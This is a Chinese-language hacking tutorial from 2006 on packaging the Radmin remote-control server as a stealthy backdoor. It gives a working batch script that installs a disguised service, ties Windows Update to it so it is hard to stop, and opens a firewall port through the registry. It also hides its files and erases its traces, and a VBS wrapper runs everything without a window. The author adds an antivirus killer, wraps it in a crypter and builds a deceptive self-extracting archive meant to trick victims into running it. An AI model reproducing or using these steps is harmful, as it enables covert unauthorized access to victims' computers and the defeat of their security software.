中华网络安全联盟    作者：未知    来源：网络    时间：2006-4-5

大家好，关于如何打造出完美的Radmin服务端，网上有很多类似的修改后的程序，但有的服务名会暴露，有的会显示CMD窗口，我弥补了它们的缺点，综合了它们的优点，打造出了现在这个完美的Radmin服务端。 

准备工具 
Rock免杀工具；
IcoSprite图标更改器；
Killer15杀杀毒软件防火墙工具；
SC.exe服务添加删除更改工具；
AdmDll.dll、Raddrv.dll、R_server（这个不用说了吧，Radmin的服务端）。

程序特点
自解压形式，双击即可，自动解压到%systemroot%\system32\drivers\目录下，并能干掉卡巴斯基等杀毒软件。使用vbs嵌套bat来执行所有内容，不会跳出任何窗口。自建服务，并修改服务名、显示名、描述使其做到隐蔽。依存Windows Update服务，给试图关闭它带来困惑。做完一切后以只读，隐藏形式隐蔽Radmin服务端的三个程序，删除掉生成的一些REG、BAT、VBS文件，并能够突破Radmin外部连接进来时XP SP2防火墙的拦截。

制作过程
首先自己安装一下Radmin服务端，配置完密码，端口等信息后导出其在HKEY_LOCAL_MACHINE\SYSTEM\RAdmin的注册表文件，这里我另存为名Server.reg。然后要修改R_server.exe的图标并修改文件名为迷惑性文字如Update.exe，修改图标我用IcoSprite，觉得还不错。这样假如对方装有天网之类防火墙的话，可以骗过一些菜鸟，同意允许对外连接。
接下来我们制作核心部分，最关键的BAT，重要的我将简单解释：
@echo off 
@sc stop r_server
‘假如已经被装过R_server服务，先用SC将它停掉。
@sc delete r_server 
‘将已经装过R_server服务删除。
@regedit /s server.reg
@SC create MPservice BinPath= "%systemroot%\system32\drivers\Update.exe /service" type= own type= interact start= auto DisplayName= "Media Player of Remote

Control Driver Update"
‘这句是用SC建立一个服务，服务名为Mpservice，路径Binpath为"%systemroot%\system32\drivers\Update.exe /service"，类型type为 own 与interact交互，启动类型start为 自动，显示名DisplayName为"Media Player of Remote Control Driver Update"。
@sc description MPservice "为Windows Media Player提供加载进程及驱动程序、库提供基层更新安全补丁的服务。"
‘这句是将MPservice服务的描述改为“为Windows Media Player提供加载进程及驱动程序、库提供基层更新安全补丁的服务。” 
@sc config wuauserv depend= MPservice
‘配置MPservice使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的wuauserv是系统在Windows Update 网站的自动更新服务）。这里的目的是迷惑管理员，使其不敢轻易停止我们生成的Radmin服务。
@echo Windows Registry Editor Version 5.00 > %systemroot%\system32\drivers\DisFirewall.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\

StandardProfile\GloballyOpenPorts\List] >> %systemroot%\system32\drivers\DisFirewall.reg
‘这里添加成的一个DisFirewall.reg注册表文件，在对方是XP SP2系统的情况下将起到很大重要，由于SP2自带的防火墙配置信息是存放于注册表中的，所有完全可以通过写入自己想要的信息使你的R_server可以接受外界的连接。
@echo "5151:TCP"="5151:TCP:*:Enabled:Windows Update Services">> stemroot%\system32\drivers\DisFirewall.reg
‘这句是允许外部连接5151的TCP端口，设置防火墙此规则名为Windows Update Services。
@regedit /s %systemroot%\system32\drivers\DisFirewall.reg
@attrib +h +r %systemroot%\system32\drivers\Update.exe
@attrib +h +r %systemroot%\system32\drivers\admdll.dll
@attrib +h +r %systemroot%\system32\drivers\raddrv.dll
‘以上三句是设置服务端三个文件为隐藏、只读属性。
@sc start MPservice
@del /q /f /s %systemroot%\system32\drivers\server.reg
@del /q /f /s %systemroot%\system32\drivers\Update.vbs
@del /q /f /s %systemroot%\system32\drivers\Update.bat
@del /q /f /s %systemroot%\system32\drivers\sc.exe
@del /q /f /s %systemroot%\system32\drivers\DisFirewall.reg
‘以上是清理生成出来的杂物，加参数/q是以安静模式删除，不要求确认，参数/f是强制删除只读文件，参数/s是从所有子目录删除指定文件。
接下来制作一个vbs文件，作用是令bat里的内容以安静模式执行，这样就可以让cmd窗口跳出来了，增加了不少隐蔽性。里面写上如下代码：
On Error Resume Next
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("Update.bat"，0)
最后出场的是Killer15.exe这个东东，按它的说明书说是可以杀Norton AntiVirus、McAfee、个人计算机Cillin&KAV等。我用我的卡巴2006测试过，确实能被它杀掉。由于直接运行的话还没执行就被杀毒软件给干掉了，所以给它加个壳，这里用Rock免杀工具，经过它加的壳后逃过了我卡巴的大关，格式是：usage: rock [filename]。
好了，整理一下：三个服务端文件+一个注册表信息，一个BAT，一个VBS，一个SC，一个Killer15，一共是8个文件，将它们打包制成自解压形式。勾选RAR里的“创建自解压格式压缩文件”，到高级里打开“自解压选项”，“解压路径”为%systemroot%\system32\drivers\，解压后运行“Update.vbs”，解压前运行“Killer15.new.exe”，模式里选“全部隐藏”跟“跳过已经存在文件”，文本和图标选项里“从文件加载自解压文件图标”里选一个迷惑性的ico图标做为自解压最后生成的图标。OK，一个自解压形式的Radmin服务端就这样生成了。假如你是靠欺骗别人双击执行的，你还可以自己添加个小游戏之类的进去，令它双击自解压的同时不会什么反映都没有，这里我就不再阐述了。
最后感谢很多朋友对我的帮助，对于最后的服务端，假如大家有什么好的建议还请到黑防论坛赐教。